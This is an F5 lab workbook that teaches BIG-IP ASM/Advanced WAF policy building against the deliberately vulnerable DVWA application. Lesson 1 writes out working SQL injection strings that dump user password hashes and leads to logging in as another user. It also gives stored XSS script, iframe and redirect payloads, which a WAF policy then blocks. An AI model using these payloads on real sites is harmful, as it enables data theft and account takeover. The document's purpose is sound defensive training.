PBC - ASM AWAF Full Course - Workbook - v15.1 2020-07-06

This document provides exercises to accompany lessons for the BIG-IP Application Security Manager (ASM) and Advanced WAF course. The exercises guide students to complete hands-on tasks related to ASM features, including creating security policies, using file type enforcement, policy building for trusted and untrusted requests, staging and enforcing entities, using attack signatures, brute force protection, CSRF and parameter tampering protection, geolocation enforcement, data guard and PCI compliance, parent and child security policies, login enforcement and violation detection, cookie hijacking protection, layer 7 DOS and bot defense protection, distributed brute force and credential stuffing protection, and behavioral DOS protection.


PBC – 3-day Partner

BIG-IP ASM / AWAF Course


Hands-On Exercise Guide – UDF Version

Document version 15.1A


Written for: TMOS® Architecture v15.1.0.0.0.31

F5 Worldwide Field Enablement Last Updated: 7/22/2020


Learn More, Sell More, Sell Faster
UDF Environment Diagram

©2020 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the U.S. and in certain
other countries. Other F5 trademarks are identified at f5.com.

Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or
affiliation, express or implied, claimed by F5.

These training materials and documentation are F5 Confidential Information and are subject to the F5 Networks Reseller Agreement. You
may not share these training materials and documentation with any third party without the express written permission of F5.
Table of Contents

Application Security Manager ........................................................................................................................... 1


ASM Lesson 1 – Application Security Overview and Security Policies ....................................................... 1
Exercise – Create an ASM Security Policy ..................................................................................................... 2
ASM Lesson 2 – File Type Enforcement ........................................................................................................ 7
Exercise – Use File Type Enforcement .......................................................................................................... 8
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests .................18
Exercise – Use Policy Building with Trusted and Untrusted Requests .....................................................19
ASM Lesson 4 – Learning, Staging, and Enforcement................................................................................25
Exercise – Stage and Enforce Entities .........................................................................................................26
ASM Lesson 5 – Attack Signatures ..............................................................................................................33
Exercise – Use ASM Attack Signatures ........................................................................................................34
ASM Lesson 6 – Brute Force Protection .....................................................................................................41
Exercise – Use Brute Force Protection........................................................................................................42
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement ..48
Exercise – Add CSRF and Parameter Tampering Protection, and Geolocation Enforcement.................49
ASM Lesson 8 – Data Guard and PCI Compliance ......................................................................................59
Exercise – Use Data Guard and Attain PCI Compliance .............................................................................60
ASM Lesson 9 – Parent and Child Security Policies....................................................................................65
Exercise – Use Parent and Child Security Policies ......................................................................................66
ASM Lesson 10 – Login Enforcement and Violation Detection .................................................................73
Exercise – Use Login Enforcement and Violation Detection .....................................................................74
ASM Lesson 11 – Cookie Hijacking Protection ...........................................................................................81
Exercise – Use Cookie Hijacking Protection................................................................................................82
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection ...............................................87
Exercise – Use Layer 7 DoS and Bot Defense Protection...........................................................................88
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection .......................................97
Exercise – Use Distributed Brute Force and Credential Stuffing Protection ............................................98
ASM Lesson 14 – Behavioral DoS Protection ...........................................................................................106
Exercise – Use Behavioral DoS Protection ................................................................................................107
ASM Lesson 15 – DataSafe ........................................................................................................................112
Exercise – Use DataSafe Protection ..........................................................................................................113
ASM Lesson 1 – Application Security Overview and Security Policies

Application Security Manager


ASM Lesson 1 – Application Security Overview and Security Policies

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 1

Exercise – Create an ASM Security Policy


• Estimated completion time: 30 minutes

Task 1 – Access Your Class Application Portal


Use a web browser to access your class application portal.

− Open the email from your instructor containing the class application links, and then click the link assigned to you.
This opens your class application portal.
− For the Windows Jumpbox image click RDP, and then log in as external_user / admin.F5demo.com
− From the desktop open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool dvwa_pool

Task 2 – Verify Web Site Vulnerabilities


Access the DVWA web application and attempt two well-known attacks against the application.

− Open a new Firefox window and click the DVWA bookmark, and then log in as hacker / hackyou.

SQL Injection
− On the navigation menu click SQL Injection, then type 6 in the User ID field, and then click Submit.
The purpose of this feature is to print the ID, first name, and surname of the submitted user ID. This is the
expected behavior of this feature.
− Copy and paste the following in the User ID field, and then click Submit. (NOTE: Use the copy and paste guide
inside the Documents directory.)
%' or 1='1

You are presented with all the users in the database.


− Copy and paste the following in the User ID field, and then click Submit.
' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

This statement returns the user ID, first name, last name, user name, and password (in a hash format) of all users
in the users table.
− Note that there is a user named Victim User with the username of “victim”.
− Select the hashed password value for victim, and then right-click and select Search Google for “8a24367a1f4…”.

− Select the first link with the decoded hash value and note the decoded password value.

The decoded value is “P@ssw0rd!”.


− Close the tab, then on the DVWA page click Logout, and then log back in as victim / P@ssw0rd!
At the bottom of the page note that we’ve successfully logged in with another user’s credentials.
A successful SQL injection exploit can read sensitive data from the application database, modify database data,
or even delete data or the entire database.

Cross-Site Scripting
− Click XSS stored, then create an entry named Review, then copy and paste the following Review, and then
click Submit Review.
This web site is very useful. It’s helped me understand the vulnerabilities that my web application has. I
guess my web developers aren’t as skilled as I thought they were.

This feature enables users to make web site comments. This is the expected behavior of this feature.
− Create another entry named Attack, then copy and paste the following Review, then click Submit Review,
and then click OK.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

This message is written in JavaScript code.


− Open Internet Explorer and click the DVWA bookmark, then log in as bobsmith / password, and then
click XSS stored.
The user is presented with an alert dialog box that was written by the hacker.
− Click OK, and then click Home.
− In the Firefox window (the hacker’s window) create another entry named Virus, then copy and paste the
following Review, and then click Submit Review. (and click OK at the dialog box.)
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

− In the Internet Explorer window (for bobsmith) click XSS stored and click OK, and then scroll down the page.

→NOTE: It’s possible this URL may no longer work, based on when you are doing this exercise.

The hacker used an iframe script to display a dangerous web site on the legitimate web page. All users will see
this page when they access this comments page.
− Click Home.
− In the Firefox window (the hacker’s window) click Setup, and then click Create / Reset Database.
This will remove the previous three entries.
− Click XSS stored, then create another entry named Command line, then copy and paste the following Review, then
click Submit Review, and then click the DVWA bookmark.
<script>window.location="http://hackertyper.net"</script>

− In the Internet Explorer window (for bobsmith) click XSS stored.
The user is now immediately redirected to what appears to be a command line (which is actually a web page
meant to fool the victim).

Cross-site scripting is a powerful exploit because a hacker can insert any form of script code into the database.
Another thing to keep in mind: The hacker was able to insert all the cross-site script attacks while logged into the
web application as the user account victim (which he accessed from the successful SQL injection attack).
− Close Internet Explorer.
− In the Firefox window click Setup, and then click Create / Reset Database.
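All three stored XSS entries in Task 2 work because the review text is written back into the page exactly as it was submitted in the mtxMessage field. The following Python example, added here and not part of the lab or DVWA, renders constructed copies of the three reviews with a DVWA-style renderer and with HTML-body output encoding, and checks which output still carries markup the browser would execute (the iframe src is replaced by a placeholder URL; the regex and helper names are this example's own).

```python
import html
import re

# Constructed copies of the three reviews submitted through mtxMessage in the exercise.
PAGE_REVIEWS = {
    "Attack": '<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>',
    "Virus": '<iframe src="https://example.invalid/dangerous.jpg" width="650" height="320"></iframe>',
    "Command line": '<script>window.location="http://hackertyper.net"</script>',
}

# Markup that runs code or embeds foreign content once the browser parses it.
ACTIVE_MARKUP = re.compile(r"<\s*(script|iframe|object|embed)\b|\son\w+\s*=", re.IGNORECASE)


def render_vulnerable(name, message):
    """DVWA-style: the stored review is written into the HTML body unchanged, so any
    tags the reviewer typed become part of the page every later visitor loads."""
    return f'<div class="review"><b>{name}</b><br>{message}</div>'


def render_escaped(name, message):
    """Hardened: output encoding for the HTML-body context turns <, >, &, and quotes
    into entities, so the browser displays the payload as text instead of parsing it."""
    return f'<div class="review"><b>{html.escape(name)}</b><br>{html.escape(message)}</div>'


def contains_active_markup(rendered):
    """True when the rendered fragment still contains executable or embedding markup."""
    return ACTIVE_MARKUP.search(rendered) is not None


def audit(reviews):
    """For each stored review, report whether each renderer leaves active markup."""
    return {
        name: {
            "vulnerable": contains_active_markup(render_vulnerable(name, msg)),
            "escaped": contains_active_markup(render_escaped(name, msg)),
        }
        for name, msg in reviews.items()
    }
```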

Task 3 – Create a Security Policy using Rapid Deployment


Create a security policy using the Rapid Deployment policy template.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and click dvwa_virtual.
This virtual server was created by the TMSH command in task 1 and is the unprotected virtual server you were
attacking. It uses the IP address 10.1.10.35 and port 80. Notice that this virtual server is configured with the
default http profile, which is required when using an ASM security policy.
− Open the Security > Application Security > Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)
Enforcement Mode Blocking
Signature Staging Disabled

That’s all it takes to create a basic security policy with BIG-IP ASM. Using Rapid Deployment includes several
common security measures and thousands of attack signatures.

Task 4 – Re-attempt to Attack the Web Application


Re-attempt the attacks against the DVWA web application, and then use the BIG-IP ASM event log for detailed
information on the malicious requests.

− Once the policy is created, in the DVWA page (in Firefox) click SQL Injection, then copy and paste the following
in the User ID field, and then click Submit.
%' or 1='1

The SQL injection attempt is blocked by ASM.


− Click the DVWA bookmark (don’t click the Back button), then click XSS stored, then create an entry
named My attack, then copy and paste the following Review, and then click Submit Review.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

− Click the DVWA bookmark, then click XSS stored, then create an entry named Virus, then copy and paste the
following Review, and then click Submit Review.
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

Both cross-site scripting attempts are blocked by ASM.


− Close Firefox.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Click the filter icon.

− For Request Status select Blocked, and then click Apply Filter.
There are three blocked log entries.
− Select the /vulnerabilities/sqli/ log entry and click Attack signature detected.

ASM provides details about the different violation types.


− Under Occurrences click 2.

You can see exactly what text the attacker input into the field, the attack signature that was matched, and the
parameter the hacker tried to exploit (id).
− Examine the Violation Rating and Attack Types values.

This request was blocked because it was recognized as SQL injection.


− Click SQL-Injection.
ASM provides details about the different attack types.
− Select the first /vulnerabilities/xss_s/ log entry and under Occurrences click 3, and then scroll down to view the
different matched attack signatures.
This request matched multiple attack signatures (for the script tag and alert()) in the mtxMessage parameter.

− Select the second /vulnerabilities/xss_s/ log entry and under Occurrences click 2, and then scroll down to view the
different matched attack signatures.
This request matched multiple attack signatures (for the iframe tag and src https) in the mtxMessage parameter.
− Examine the Violation Rating and Attack Types values.
This request was blocked because it was recognized as cross-site scripting.
− Examine the Decoded Request section.
You can view the entire HTTP request, including the request line, all HTTP request headers, and the request
body. This enables the security administrator to view exactly what text was input into the form by the attacker.

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit

ASM Lesson 2 – File Type Enforcement

ASM Lesson 2 – File Type Enforcement


Exercise – Use File Type Enforcement


• Estimated completion time: 45 minutes.

Task 1 – Verify Forceful Browsing Vulnerabilities


Use a web browser to access the DVWA web site and attempt forceful browsing attacks.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } rules { random_ip_addresses } security-log-profiles add { "Log all requests" } pool dvwa_pool

− Open a new Firefox window and click the DVWA bookmark, and then change the URL to http://10.1.10.35/php.ini.

− Change the URL to http://10.1.10.35/README.md, and examine the following text in the middle of the page:

− Click the DVWA bookmark, and then attempt to log in as admin / password.
These are examples of confidential files that are not accessible through web links but are present within the web
server directory. A forceful browsing attack aims to access resources that are not referenced by the web
application but are still accessible.
− Click Logoff, and then close the DVWA page.


Task 2 – Configure a Security Policy to Learn File Types


Create a security policy for dvwa_virtual, and then configure it to learn file types.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and click dvwa_virtual, and then open the Resources page.
− In the iRules section click /Common/random_ip_addresses.
This iRule was added to the virtual server using the TMSH command. This iRule will simulate each client request
coming from a unique worldwide IP address.
− Open the Application Security > Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)

− Once the policy is created click dvwa_security_policy.


− Under the Advanced settings, for Trust XFF Header select the Enabled button, and then click Save.

This setting will enable ASM to use the X-Forwarded-For value (from the iRule) as the IP address of each
incoming request.
− Open the Application Security > Policy Building > Learning and Blocking Settings page.
− Expand File Types.

− From the Learn New File Types list select Always.

− For the Illegal file type violation select the Learn, Alarm, and Block checkboxes.

− Click Save, and then click Apply Policy.


Task 3 – Generate Learning Suggestions for the Security Policy


Use the DVWA site to generate learning suggestions for dvwa_security_policy.

− Open the Application Security > Policy Building > Traffic Learning page.
There are no learning suggestions.
− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in
as bobsmith / password.

→NOTE: You need to use a New private window to ensure that the browser doesn’t create the web page using
cached content.

o Near the bottom of the page click to view the user policy, and then click the link to return to
the main DVWA page.
o Near the bottom of the page click to view the PDF file, and then click the DVWA bookmark.
o Click Instructions, then click Setup, and then click SQL Injection.
o Click Logout, then click the DVWA bookmark, and then change the URL to http://10.1.10.35/php.ini.
o Change the URL to http://10.1.10.35/README.md, and then close the Firefox window.

→NOTE: Remember: learning suggestions may come from malicious requests.

− In the Configuration Utility reload the Traffic Learning page.


There are now several learning suggestions.
− Select the Add File Type suggestion for php and view the data in the middle of the page.

Questions:
What is the current learning score for php? __________________

How many sample requests were used for this suggestion? _______________________

− Select the Add File Type suggestion for md and view the data in the middle of the page.

Questions:
What is the current learning score for md? __________________

How many sample requests were used for this suggestion? _______________________

Task 4 – Adjust the Policy Learning Speed


Use the Learning and Blocking Settings page to adjust the speed that ASM uses for learning suggestions.

− Open the Application Security > Policy Building > Learning and Blocking Settings page.
− At the bottom of the page select the Advanced settings.

− Expand Loosen Policy, and then for Untrusted Traffic update the values as follows:

− Click Save, then click Apply Policy.


− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in
as bobsmith / password.
o Near the bottom of the page click to view the user policy, and then click the link to return to
the main DVWA page.
o Near the bottom of the page click to view the PDF file, and then click the DVWA bookmark.
o Click Instructions, then click DVWA Security, then click About, then click Logout,
and then close the Firefox window.
− In the Configuration Utility open Traffic Learning page, and then examine the updated learning scores.
− Select the Add File Type suggestion for php and examine the number of sample requests and the number of
total requests.
− In the list of samples select the first URL in the list, and then view the details on the right-side of the page.

Questions:
What geolocation was this request from? __________________

What was the Attack Type? _______________________

What was the full HTTP request line? _____________________________________

− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in as bobsmith.
o Click to view the user policy, and then click the link to return to the main DVWA page.
o Click to view the PDF file, and then click the DVWA bookmark.
o Click Setup, and then click Logout.
o Change the URL to http://10.1.10.35/README.md, and then close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page and examine the updated learning scores.
− Select the Add File Type suggestion for php and examine the number of sample requests and the number of
total requests.
− Select the Add File Type suggestion for pdf and examine the number of sample requests and the number of
total requests.
− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in as bobsmith.
o View the user policy, then return to the main DVWA page.
o View the PDF file, and then close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page, and then select the Add File Type suggestion for php.

Questions:
What is the current learning score for php? __________________

How many sample requests were used for this suggestion? _______________________

− Select the Add File Type suggestion for md.

Questions:
What is the current learning score for md? __________________

How many sample requests were used for this suggestion? _______________________


Task 5 – Manually Add File Types to the Security Policy


Select the file types needed for the web application and accept them to dvwa_security_policy.

− Select the Add File Type suggestion for php.


− On the right-side of the page select Related Suggestions > Suggestions with the same section.

We can quickly see all file type suggestions for this security policy.
− Click on the Open Filter icon, and then select Advanced Filter.

− Adjust the Learning Score slider to 25 – 100, and then click Apply Filter.
There should be 10 learning suggestions for css, gif, html, ico, jpg, js, no_ext, pdf, php, and png.
We’ve identified that these are all valid file types needed for this web application.
− Click the Select all items checkbox.

− Examine the details in the middle of the page.


Notice that the Action for each of these suggestions is Add File Type.

− Click Accept and identify the two options.


Accept suggestions edits the security policy by performing the Action.
Accept suggestions and enable staging on entities accepts the suggestions and places the entities in staging.
− Select Accept suggestions and enable staging on entities.

This adds these file types to this security policy and keeps them in staging.
− Click on the Open Filter icon, then adjust the Learning Score slider to 0 – 24, and then click Apply Filter.
We do not want to add these two file types to the security policy.
− Click the Select all items checkbox, and then click Ignore.
If we were to select Delete, these file types could re-appear in the suggestion list if they are requested again.
− Open a New private window (Firefox) and click the DVWA bookmark, and then change the URL
to http://10.1.10.35/private.txt.
− Change the URL to http://10.1.10.35/README.md, and then close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page.
There is a new Add File Type suggestion for txt, but there isn’t one for md, because we selected to ignore the
original suggestion.
− Open the Application Security > File Types > Allowed File Types page.

− Select the * checkbox, and then click Delete and then OK, and then click Apply Policy.
− Open a New private window (Firefox) and click the DVWA bookmark, and then change the URL
to http://10.1.10.35/php.ini.

Questions:
Were you able to access the ini file? _________________________

Why is BIG-IP ASM still allowing access to illegal file types? ___________________________

− In the Configuration Utility open the Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Mouse over the exclamation point (!) icon in the log entry.

Questions:
Are requests for ini files legal, illegal, or blocked? ____________________

What do you need to configure in BIG-IP ASM to block access to these file types?

_______________________________________________________________


Task 6 – Modify the Security Policy’s Enforcement Mode


Update the dvwa_security_policy enforcement mode to Blocking mode.

− Open the Security > Security Policies > Policies List page and click dvwa_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Enforcement Mode select the Blocking button, and then click Save, and then click Apply Policy.
− In Firefox reload the http://10.1.10.35/php.ini page.
− Change the URL to http://10.1.10.35/README.md.
− Change the URL to http://10.1.10.35/private.txt.
All three illegal requests are now blocked by BIG-IP ASM; however, the blocking page is very basic.
− In the Configuration Utility under Security Policy Configuration click Response and Blocking Pages.
− For Blocking Page Default, from the Response Type list select Custom Response.

− Copy and paste the following into the Response Body. (Be sure to replace the existing content. The
<%TS.request.ID()%> tag is expanded by ASM into the support ID of the blocked request, so it can be
looked up in the event log.)
<html><head><title>Illegal Request</title></head>
<body>For security purposes, Lorax Investments has blocked this <font color=red>illegal request</font>.<br><br>
You can contact our technical support department and supply them with the following support ID:
<b><%TS.request.ID()%></b><br><br>
<a href='javascript:history.back();'>[Go Back]</a></body></html>

− Click Save, and then click Apply Policy.


− Reload the blocked page.
− Copy the support ID number of the blocked request, and then close the blocked page.
− In the Configuration Utility open the Event Logs > Application > Requests page.
− Click the Open Filter icon.

− Paste the value you copied into the Support ID field, and then click Apply Filter.
− Under Occurrences click 1.

The request was blocked because it raised an Illegal File Type violation: txt is not on the allowed file types list.
− In the Attack Types row click Forceful Browsing.
BIG-IP ASM provides details about attack types.


PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit

Question and Answer Key


Task 3 – Generate Learning Suggestions for the Security Policy
Q: What is the current learning score for php?
A: 5%

Q: How many sample requests were used for this suggestion?


A: 1

Q: What is the current learning score for md?


A: 5%

Q: How many sample requests were used for this suggestion?


A: 1

Task 4 – Adjust the Policy Learning Speed


Q: What geolocation was this request from?
A: Answers will vary.

Q: What was the Attack Type?


A: N/A (it wasn’t an attack.)

Q: What was the full HTTP request line?


A: Answers will vary (It may be GET /logout.php HTTP/1.1)

Q: What is the current learning score for php?


A: 100%

Q: How many sample requests were used for this suggestion?


A: Answers will vary, but it should be around 10.

Q: What is the current learning score for md?


A: 20%

Q: How many sample requests were used for this suggestion?


A: 2

Task 5 – Manually Add File Types to the Security Policy
Q: Were you able to access .ini file?
A: Yes

Q: Why is BIG-IP ASM still allowing access to illegal file types?


A: The security policy is still in transparent mode.

Q: Are requests for .ini files legal, illegal, or blocked?


A: Illegal

Q: What do you need to configure in BIG-IP ASM to block the illegal file types?
A: Move the security policy to blocking mode.

ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests

NOTES

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

Exercise – Use Policy Building with Trusted and Untrusted Requests
• Estimated completion time: 45 minutes.

Task 1 – Create a Security Policy Manually Using Untrusted Requests


Create an ASM security policy using manual learning and using untrusted requests, then visit the DVWA web
application and view the details in the BIG-IP ASM Traffic Learning page.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool dvwa_pool
exit

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment
Virtual Server dvwa_virtual (HTTP)

− Once the policy is created open the Application Security > Policy Builder > Learning and Blocking Settings page.
− Expand File Types, and then from the Learn New File Types list select Always.
− Collapse File Types, then expand Parameters, and then from the Learn New Parameters list select Always.
− Collapse Parameters, then expand URLs, and then from the Learn New HTTP URLs list select Always.
− Click Save, and then click Apply Policy.
− Open a New private window (Firefox) and click the iMacros button.

− In the iMacros pane select Exercises > manual build.iim, and then click Play (Loop).
This macro simulates requests for several URLs and parameters on the DVWA web application.
− Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Application Security > Policy Building > Traffic Learning page.
There are several learning suggestions for Add File Type, Add URL, Add Parameter, and Add Enforced Cookie.

− Scroll through the list and view the learning suggestion scores for the different suggestions.
All learning suggestions have a learning score of 5%.
− Select the Add File Type learning suggestion for php and examine the details in the middle of the page.

Although the iMacro visited several php web pages, the policy builder only used a single php file type request
for this learning suggestion. Also note that the request came from a single untrusted source.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > manual build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page and examine the learning suggestion scores.
The learning suggestion scores didn’t increase.
− Select the Add File Type learning suggestion for php and examine the details in the middle of the page.
There is still only one sample from this untrusted source. When using untrusted requests, there needs to be
several requests from several unique sources over time to see an increase in the learning scores.

Task 2 – Add a Trusted IP Address Range


Add the IP address range of 10.1.10.0/255.255.255.0 as a trusted source, and then simulate traffic again and view
the results on the Traffic Learning page.

− Open the Application Security > IP Addresses > IP Address Exceptions page and click Create.
We use this page to add a trusted IP address or IP address range for the security policy.
− Use the following information for the trusted IP, and then click Create.
IP Address 10.1.10.0
Netmask 255.255.255.0
Policy Builder trusted IP Enabled
The Windows Jumpbox IP address is 10.1.10.199.
− Open the Learning and Blocking Settings page, and at the bottom of the page expand Trusted IP Addresses.

The 10.1.10.0/255.255.255.0 range is now a trusted source for building this security policy. NOTE: We could
have added this trusted IP address range when we created the security policy.
− Expand Loosen Policy and examine the Trusted Traffic values.
It will only take a single request from a trusted source to affect the learning score.
− Click Apply Policy.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > manual build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Traffic Learning page and examine the updated learning scores.

Questions:
What are the current learning scores for all suggestions? __________________

Why did the scores go up so quickly? __________________________________________

Now that the learning suggestions are at 100%, why didn’t ASM accept them into the policy?

________________________________________________________________________

Task 3 – Create a Security Policy Automatically Using Trusted Requests


Create a security policy using automatic learning and using trusted requests, then visit the DVWA web application,
and then view the results in the security policy.

− Open the Policies List page, then select the dvwa_security_policy checkbox, and then click Delete and then OK.
(HINT: You can simply click on “Application Security”.)
− Click Create, and then use the following information for the new policy:
Policy Name dvwa_security_policy
Policy Template Fundamental
Virtual Server dvwa_virtual
Application Language Unicode (utf-8)
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

Notice that we can also add the trusted IP address(es) while creating the security policy.

Questions:
What is the default Learning Mode when using Fundamental? __________________

What is the default Enforcement Mode when using Fundamental? _________________

− Click Save.
− Once the policy is created open the Learning and Blocking Settings page.
− Expand File Types, and then from the Learn New File Types list select Always.
Notice that the Fundamental policy template includes the Learn, Alarm, and Block checkboxes for
all File Types violations.
− Collapse File Types, then expand Parameters, and then from the Learn New Parameters list select Always.
Notice that the Fundamental policy template includes very few parameters settings.

− Select the Learn, Alarm, and Block checkboxes for all parameter violations.

− For Parameter Level select the URL option.

Using parameters at the URL level enables more granular security than at the global level.
− Select the Classify Value Content of Learned Parameters checkbox.

This enables the policy builder to identify the type of data being submitted into different parameters.
− Collapse Parameters, then expand URLs, and then from the Learn New HTTP URLs list select Always.
− Select the Learn, Alarm, and Block checkboxes for the Illegal URL violation.

− Click Save, and then click Apply Policy.


− Open a New private window (Firefox) and in the iMacros pane select Exercises > auto build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Traffic Learning page.

Questions:
Are there any suggestions for Add File Type, Add URL, or Add Parameter? ________

If not, why not? _____________________________________________________________

− Click the Open Filter icon.


− From the Status list select Accepted and Staged, and then click Apply Filter.
− Scroll through the list and view the learning suggestion scores for the different suggestions.
All Add File Type, Add URL, and Add Parameter suggestions have a learning score of 100% because the requests
came from a trusted IP address. All learning suggestions were also accepted and added to the security policy
upon reaching 100% because you’re using automatic policy building.

− On the right-side of the page in the Traffic Learning Summary section, expand
the Enforcement Readiness Summary section.

From this section you can see how many file types, URLs, parameters, cookies, and signatures have been added
to the security policy.
− Open the Application Security > File Types > Allowed File Types page.
Around 9 file types have been added to the file type whitelist.
− Open the Application Security > URLs > Allowed URLs page.
Around 26 URLs have been added to the URL whitelist.
− Open the Application Security > Parameters > Parameters List page.
Around 23 or 24 parameters have been added to the parameter whitelist.
− Examine the values in the Parameter Level column.
Each parameter has been associated with a specific URL. Notice there are two Login, Submit, id, password,
and username parameters (the username parameters will be found on page 2), each found on different URLs.

→NOTE: It’s OK if you don’t currently have two Login, Submit, id, password, and/or username parameters,
the security policy will be updated in the next exercise.

Question and Answer Key


Task 2 – Add a Trusted IP Address Range
Q: What are the current learning scores for all suggestions?
A: 100%

Q: Why did the scores go up so quickly?


A: We are generating the learning suggestions from a trusted source (10.1.10.199, the Windows
workstation).

Q: Now that the learning suggestions are at 100%, why didn’t ASM accept them into the policy?
A: The security policy is in manual learning mode; therefore, all suggestions must be manually
accepted by an administrator.

Task 3 – Create a Security Policy Automatically Using Trusted Requests
Q: What is the default Learning Mode when using Fundamental?
A: Automatic mode

Q: What is the default Enforcement Mode when using Fundamental?


A: Blocking mode

Q: Are there any suggestions for Add File Type, Add URL, or Add Parameter?
A: No

Q: If not, why not?


A: All learning suggestions came from a trusted source and therefore received learning scores of
100%. Because the security policy is in automatic mode, all these suggestions are immediately
accepted to the security policy.


ASM Lesson 4 – Learning, Staging, and Enforcement

NOTES

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________

________________________________________________________________________________________


Exercise – Stage and Enforce Entities


• Estimated completion time: 45 minutes.

Task 1 – Review Current Entity Settings


Use the Allowed File Types and Parameters List pages to review the current settings of these two entity types.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Application Security > File Types > Allowed File Types page.

→NOTE: This exercise requires the dvwa_security_policy you created at the end of the previous exercise. If you
don’t have this security policy, you’ll need to repeat task 3 from the previous exercise.

This security policy has already learned all needed file types. Each file type is an entity. Notice that each file type
has four length limit values. Each of these values is an attribute. In addition, all the file types are in staging.
While in staging, the length limit value for each file type will not be enforced. In addition, the wildcard (*) entry
is still in the list.
− Open the Application Security > Parameters > Parameters List page.
BIG-IP ASM has also added several parameters to the parameters whitelist. Each parameter is also an entity.
All parameters are still in staging. In addition, the wildcard (*) entry is still in the list. Also note that all
parameters have a Parameter Value Type of Ignore value. This means that BIG-IP ASM won’t block values
